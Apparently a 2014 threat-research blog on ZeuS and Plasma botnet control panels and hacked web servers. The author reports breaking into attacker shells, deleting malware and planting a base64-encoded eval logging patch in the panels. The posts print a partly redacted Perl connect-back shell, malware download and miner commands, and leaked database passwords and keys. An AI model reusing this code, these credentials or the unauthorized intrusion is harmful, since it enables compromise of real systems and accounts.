Thursday, January 30, 2014

PlasmaHTTP botnet on djurres.nl

PlasmaHTTP botnet and other junk on djurres.nl.

Plasma bot is Windows-based malware that uses HTTP to communicate with its Command & Control server. Its primary functions are credential theft and DDoS. Not very sophisticated, but it gets the job done for many skids.

djurres.nl
185.28.23.63 - Hosting24 Servers, US
abuse@main-hosting.com

C&C:
hxxp://www.djurres.nl/plasma/cp.php?a=online

Login:



Main page:
~450 bots






Running commands:
bot.update http://djurres.nl/plasma/1-29-14.exe java-update.exe [X] 
miner.start http://djurres.nl/plasma/miner/CPUMiner.files *-a scrypt -o stratum+tcp://eu.multipool.us:7777 -O Djurres.2:x -t 4* [X] 
miner.gpu.start http://djurres.nl/plasma/miner/GPUMiner.files *-a scrypt -o stratum+tcp://eu.multipool.us:7777 -u Djurres.1 -p x -g yes* [X] 
wait [X]

Real Fact: Mining for Bitcoin has huge profit margins.
CPU and GPU ?!?! Woah bro. 1337.

DDoS? uber cool! 


Stats:


Password log:


Ok, now this is the pathetic part.
I almost felt bad taking this botnet down.

Yes, that is a directory called "A Hackers Folder"


His pet RAT collection:


And a library of eBooks on how to 'spread' his shitty public copy of Plasma bot. 


I thought I pulled a sample that the update script was running, but I guess not.

bot.update http://djurres.nl/plasma/1-29-14.exe java-update.exe [X] 

It's too late now anyway.





Xzibit says:
actually, you have some eBooks to read ... so sad.




saccity.org hosting ZeuS 2.1.0.1 (2x botnets)

C&C listed on ZeuS Tracker.

saccity.org
198.58.93.56

hxxp://198.58.93.56/~saccity/.chmod/cp.php?m=login
(117 bots) - Most from India

Summary:

OS Stats:



hxxp://198.58.93.56/~saccity/.bin/cp.php
(50 bots) 2.1.0.1 - Most from India


C999shell and Bitcoin miner ELF:
saccity.org/aaa.php
saccity.org/minerd


C999 Shell
Awesome c99 mod bro...


WSO 2.5 Shell

lastlogin: 
195.5.208.250


Sorry, playtime is over for you. 


Pretty standard, nothing too interesting.

Thursday, January 16, 2014

Zeus 2.9.6.1

New ZeuS build 2.9.6.1 has leaked and is starting to be seen in the field.

Same abilities as earlier versions, but with a new "Modules Parser" (iBank).
This new feature scans the bot host for banking-related processes and banking client applications, hooks those processes, and attempts to steal credentials.

Panel found via ZeuS Tracker
hxxp://89.248.161.244/fuck/xren.php?m=home
89.248.161.244
ECATEL, Netherlands

Summary:

Modules parser:

Script running:

script:
user_execute http://eyecatchersoptique.com/images/.stnfrn/server/a.exe

a.exe
VT: (21/46)
https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/


List of users:

Name    Status   Comment
admin   Enabled  Default user
r00t78  Enabled  -


Related:

This botnet is run by the same guys seen here:

and here:


This server is now offline.

:-)

Monday, January 13, 2014

construtorassm.com.br - shells and DoS and phishing, oh my

construtorassm.com.br
177.87.155.43

Started with a WSO shell. Cracked into it.

Found all sorts of hideous junk on here, including a Crédit Agricole (French bank) phishing kit.
WSO shell
ICH Th3 Unkn0wn MySQL interface
Priv8 shell
Symlink Sa 2 panel
Dangerous Mailer
VNShell DDoS shell
K2LL33d shell
turkblackhats.com shell
1923Turk.com mod b374k shell
RootDaBitch tool - brute force local accounts using su
CA.zip - Credit Agricole kit


Ok, let's have a look.

WSO 
(this was something like the 3rd WSO I found in here...seriously??)



MySQL Interface mod



Priv8 Shell
It literally tells me the password to the shell is 'priv8'

..and the password works. What an ugly piece of garbage too!



Symlink Panel
Symlink shared hosting directories to one place and mass deface.

Domains list, but symlinks aren't working. Sorry buddy.
This thing stopped being useful a while ago.


Dangerous Mailer
Login to mailer panel.

Long view of Dangerous Mailer


VNShell Flooder
(because DoS is hacking)
This is the type of stuff they teach you at HackForums.
Oh yeah, and this isn't even a shell, even though it's called a shell.

Select the attack type

Target, http file, attack time



K2LL33d
Does it look like b374k shell (below)? 
Yes, that's because this skilled hacker just changed a few lines of code and called it his own work.
v3ry sw33t


If your eyes aren't already bleeding, get a load of this.


TurkBlackhats Shell


b374k shell (1923Turk)
Yawn.


RootDaBitch
This tool brute forces su to gain elevated privileges, using suCrack.

Directory listing of the kit, showing Bash script, password txt and screenshots?
Why?



Oh yes, because I don't know how to run a bash script, nor would there be useful info in the script source code either...sigh.

Not one, but two screenshots!
This one proves that he got in !! Wow cool. Fuck you.
Thanks "The Breacher" that was really helpful to me and my fellow skids. 


(Shake my head)

More things that are not that interesting and pretty useless but someone decided to spend time working on anyway:


PHP mailer, no panel, post method
<?php
/* Form variables */
$nome = trim(@$_POST['nome']);/* receives the data entered in the "nome" field */
$email = trim(@$_POST['email']);/* receives the data entered in the "email" field */
$assunto_user = trim(@$_POST['assunto']);/* receives the data entered in the "assunto" field */
$mensagem = trim(@$_POST['mensagem']);/* receives the data entered in the "mensagem" field */
[...redacted]

Perl back connect
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
[...redacted]
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  [...redacted]
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";



Last but not least.

Credit Agricole phishing kit - CA.zip
Includes the JS, PHP, images, etc. for the phishing site.
Bad guys redirect victim traffic to a kit like this in an effort to steal login credentials.
Crédit Agricole S.A. is the largest retail banking group in France, second largest in Europe and the eighth largest in the world by Tier 1 capital according to The Banker magazine. -Wikipedia.com 
Phishing pages:







I deleted all of this junk. All the shells, phishing pages, mailers, the DoS 'shell', all of it. I emailed the admins too: operacional[at]rapidoacesso.com.br


Sunday, January 12, 2014

ZeuS 2.1.0.1 - inlandbeardeddragons.com

Found C&C via ZeuS Tracker.

Panel was at:
hxxp://inlandbeardeddragons.com/templates/beez/.ama/cp.php?m=login

46 bots
config
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'inlandbe_ama';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'inlandbe_ama';

Running script:
user_execute http://eyecatchersoptique.com/images/.stnfrn/server/a.exe

Admin was moving bots to ZeuS 2.9.6.1

This is from the same admins researched here.

a.exe
https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/

https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/

eyecatchersoptique.com - ZeuS 2.1.0.1

ZeuS 2.1.0.1 Botnet hosted on:
eyecatchersoptique.com
69.10.139.148
Linux server.ccommunity.com 2.6.18-194.26.1.el5

network:IP-Network-Block:69.10.139.144 - 69.10.139.151
network:Organization;I:ORG-CCommunitycom
network:Tech-Contact;I:noc@rackforce.com


panel:
hxxp://eyecatchersoptique.com/webstats/_stn/cp.php?m=login
Summary:
(144 bots)


Bots:
OS Statistics


TLD index is broken Wordpress





config.php

(144 bots)
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stn';


(0 bots)
public_html/images/.stnfrn/
#2
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stnfrn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stnfrn';

Script:
user_execute hxxp://eyecatchersoptique.com/webstats/_stn/server/a.exe

Moving to ZeuS 2.9.6.1

a.exe
https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/

https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/


Saturday, January 11, 2014

Patching ZeuS cp.php to track botnet administrators

This "patch" is straightforward. Not the prettiest method, but it works for this job.

cp.php is the main control panel page used to administer a ZeuS botnet. Every time you want to check files for stolen credentials or send commands to the botnet, you would be using cp.php.

Since it is the only PHP file used for access and administration, it is the best file to patch for tracking.

Looked around on Google because I'm lazy and don't need to reinvent the wheel. I found this (modified a bit):

$file = 'sysfile.dat';
$ipadress = $_SERVER['REMOTE_ADDR'];
$date = date('d/F/Y h:i:s');
$webpage = $_SERVER['SCRIPT_NAME'];
$url = $_SERVER['REQUEST_URI'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$fp = fopen($file, 'a');
fwrite($fp, $ipadress.' - ['.$date.'] '.$url.' '.$webpage.' '.$browser."\r\n");
fclose($fp);

Encode in Base64 to be "stealthy"


eval(base64_decode('JGZpbGUgPSAnc3lzZmlsZS5kYXQnOwokaXBhZHJlc3MgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsKJGRhdGUgPSBkYXRlKCdkL0YvWSBoOmk6cycpOwokd2VicGFnZSA9ICRfU0VSVkVSWydTQ1JJUFRfTkFNRSddOwokdXJsID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiRicm93c2VyID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwokZnAgPSBmb3BlbigkZmlsZSwgJ2EnKTsKZndyaXRlKCRmcCwgJGlwYWRyZXNzLicgLSBbJy4kZGF0ZS4nXSAnLiR1cmwuJyAnLiR3ZWJwYWdlLicgJy4kYnJvd3Nlci4iXHJcbiIpOwpmY2xvc2UoJGZwKTs='));


Insert this code in cp.php, save, and it's now patched and ready to log activity!

Here is an example log for a ZeuS botnet that I was tracking.


ZeuS C&C via Google Dorks and tracking ZeuS Admins - biterelish.co.za

Over the weekend I found some ZeuS C&Cs using Google.

Most command and control servers found using dorks are offline now, but not all. This one was still active and getting larger.

I had an idea to "patch" cp.php so that I could track the guys who admin this.


ZeuS C&C

biterelish.co.za
207.45.186.26
Uname: Linux serve16.serve-hosting.net 2.6.18-448.16.1.el5.lve0.8.70PAE

CIDR:           207.45.176.0/20
OriginAS:       AS36444, AS2828
NetName:        ACENETMI

3x ZeuS botnets hosted:


Summary:
(357 bots)
OS Statistics:
Search for Files:



Summary page from last week, showing 331 bots.



Options & Encryption Key:
Monkey@Bannana123!!!

named botnets: vti, will, txt


hxxp://biterelish.co.za/txt/cp.php?m=home (RU language set on Panel)
32 bots, Active since Aug 2013 (txt)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_biterel';
$config['mysql_pass'] = 'h7Uu6wpW9A%s';
$config['mysql_db'] = 'bitereli_bitereli



hxxp://biterelish.co.za/will/cp.php?m=home
10 bots (will)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_bits';
$config['mysql_pass'] = 'Go;vEI-;le94';
$config['mysql_db'] = 'bitereli_biterel';


hxxp://biterelish.co.za/vti/cp.php?m=login
350+ bots (vti)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_admin';
$config['mysql_pass'] = '@ph;yiTpFg}?';
$config['mysql_db'] = 'bitereli_admin';


A shell was here:
hxxp://biterelish.co.za/images/temp.php#




Used the shell to patch cp.php as discussed in this post. 

Here is the access log for this ZeuS botnet.


Admin IP and ISP:
93.186.23.83 - Blackberry UK RIM
93.186.23.115 - Blackberry UK RIM
93.186.31.113 - Blackberry UK RIM
196.46.245.50 - AirTel Nigeria
196.46.245.49 - AirTel Nigeria
196.46.245.48 - AirTel Nigeria
41.203.69.2 - Globacom Nigeria
41.203.69.5 - Globacom Nigeria
41.203.69.6 - Globacom Nigeria

We can clearly see who was working on this botnet: access from two wireless provider networks in Nigeria (the user agent showed Windows 7 with Firefox) and a BlackBerry from the UK.

Law enforcement should be able to use these access logs as evidence against the admins, or at least get a clue as to who is behind this.
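As an added example (not code from the post), here is a small Python parser for the sysfile.dat lines the cp.php patch above writes, clustering the accesses by source /24 the way the "Admin IP and ISP" list is read. The sample log lines and user agents in it are constructed, not the real log.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# One line per panel request, in the form the cp.php patch's fwrite() produces:
#   <ip> - [<date>] <REQUEST_URI> <SCRIPT_NAME> <HTTP_USER_AGENT>
LINE_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) - \[(?P<date>[^\]]+)\] (?P<uri>\S+) (?P<script>\S+) (?P<ua>.*)$"
)
# PHP date('d/F/Y h:i:s') -> 11/January/2014 09:14:22. 'h' is 12-hour with no am/pm,
# so the logged times are ambiguous; 'H' in the patch would have avoided that.
DATE_FMT = "%d/%B/%Y %I:%M:%S"

# Constructed sample log, not the real sysfile.dat from the post.
SAMPLE_LOG = """\
93.186.23.83 - [11/January/2014 09:14:22] /vti/cp.php?m=home /vti/cp.php Mozilla/5.0 (BlackBerry; U; BlackBerry 9900)
196.46.245.50 - [11/January/2014 10:02:05] /vti/cp.php?m=login /vti/cp.php Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
196.46.245.49 - [11/January/2014 10:03:41] /vti/cp.php?m=home /vti/cp.php Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
this line is malformed and must be skipped
41.203.69.2 - [12/January/2014 01:55:10] /vti/cp.php?m=home /vti/cp.php Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
"""

def parse_log(text):
    """Return one dict per well-formed line; anything that does not match is dropped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["when"] = datetime.strptime(rec["date"], DATE_FMT)
        records.append(rec)
    return records

def summarize(records):
    """Cluster accesses by source /24 so IPs from the same ISP pool land together."""
    groups = defaultdict(lambda: {"ips": set(), "hits": 0, "agents": set(),
                                  "first": None, "last": None})
    for r in records:
        net = str(ipaddress.ip_network(r["ip"] + "/24", strict=False))
        g = groups[net]
        g["ips"].add(r["ip"])
        g["hits"] += 1
        g["agents"].add(r["ua"])
        g["first"] = r["when"] if g["first"] is None else min(g["first"], r["when"])
        g["last"] = r["when"] if g["last"] is None else max(g["last"], r["when"])
    return dict(groups)
```

Call summarize(parse_log(open("sysfile.dat").read())) on a real log to get, per /24, the IPs seen, hit count, user agents and first/last access time.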

Friday, January 10, 2014

ZeuS hosted on masabe7.com

ZeuS 2.1.0.1 C&C hosted on:
masabe7.com
205.251.135.234
network:ID:8.205.251.128.0/19
network:Auth-Area:205.251.128.0/19
network:Network-Name:WHB-COLO-5
network:IP-Network:205.251.135.0/24
network:Organization;I:WEBHOSTINGBUZZ.COM
network:Tech-Contact;I:engineering@gnax.net

519 bots (315 from India)

hxxp://masabe7.com/powede/cp.php?m=login


Summary:


OS Statistics:



Now it's 403 Forbidden.
Good stuff.